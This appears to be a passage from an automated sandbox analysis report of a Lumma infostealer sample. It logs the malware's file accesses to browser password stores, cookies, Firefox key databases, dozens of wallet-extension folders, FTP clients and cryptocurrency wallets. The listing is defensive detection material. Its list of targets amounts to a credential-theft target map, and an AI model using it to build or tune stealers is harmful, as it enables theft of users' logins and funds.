Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\places.sqlite
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\logins.json
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\cert9.db
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\prefs.js
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\cookies.sqlite
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\formhistory.sqlite
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\key4.db
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa

Tries to harvest and steal ftp login credentials

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\FTPInfo
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\FTPRush
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\FTPbox
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\ProgramData\SiteDesigner\3D-FTP
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\FTPGetter

Tries to steal Crypto Currency Wallets

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Directory queried: C:\Users\user\Documents
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Directory queried: C:\Users\user\Documents
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Directory queried: C:\Users\user\Documents\EFOYFBOLXA
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Directory queried: C:\Users\user\Documents\EFOYFBOLXA
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Directory queried: C:\Users\user\Documents\SUAVTZKNFL
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Directory queried: C:\Users\user\Documents\SUAVTZKNFL
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Directory queried: C:\Users\user\Documents
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Directory queried: C:\Users\user\Documents
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Directory queried: C:\Users\user\Documents\EFOYFBOLXA
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Directory queried: C:\Users\user\Documents\EFOYFBOLXA
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Directory queried: C:\Users\user\Documents\EIVQSAOTAQ
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Directory queried: C:\Users\user\Documents\EIVQSAOTAQ
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Directory queried: C:\Users\user\Documents\EFOYFBOLXA
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Directory queried: C:\Users\user\Documents\EFOYFBOLXA
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Directory queried: C:\Users\user\Documents\EIVQSAOTAQ
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Directory queried: C:\Users\user\Documents\EIVQSAOTAQ
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Directory queried: C:\Users\user\Documents\GIGIYTFFYT
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Directory queried: C:\Users\user\Documents\GIGIYTFFYT
